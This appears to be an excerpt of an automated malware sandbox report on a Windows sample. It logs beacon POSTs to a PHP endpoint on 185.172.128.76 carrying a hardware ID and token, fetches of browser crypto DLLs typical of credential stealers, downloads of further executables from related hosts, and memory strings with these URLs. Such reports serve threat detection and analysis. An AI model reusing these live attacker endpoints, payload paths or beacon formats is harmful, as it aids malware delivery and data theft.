Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="message"her7h48r------GCGHJEBGHJKEBFHIJDHC--
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache

Source: Joe Sandbox View	IP Address: 185.172.128.90 185.172.128.90
Source: Joe Sandbox View	IP Address: 185.172.128.228 185.172.128.228

Source: Joe Sandbox View

ASN Name: NADYMSS-ASRU NADYMSS-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic	HTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Code function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,

0_2_0042676C

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 26 Apr 2024 20:53:40 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec

Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic	DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic	DNS traffic detected: DNS query: download.iolo.net
Source: global traffic	DNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com

Source: unknown

HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 32 33 32 42 41 32 36 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="hwid"6A5232BA26AD2322695909------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="build"default10------BFHDAEHDAKECGCAKFCFI--

Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe
Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe00
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe6=
Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
Source: u5ek.0.exe, 00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllA
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllE
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dllo
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
Source: u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dllY
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll7
Source: u5ek.0.exe, 00000001.00000002.2160907832.000000000432A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000003.1778198760.000000000439F000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
Source: u5ek.0.exe, 00000001.00000003.1778198760.000000000439F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php(;T
Source: u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpO
Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpad32c124f7c2674f26e5e63942ecbrelease05bfdde8fa3fa3eef0df8c
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://compositewpf.codeplex.com/
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
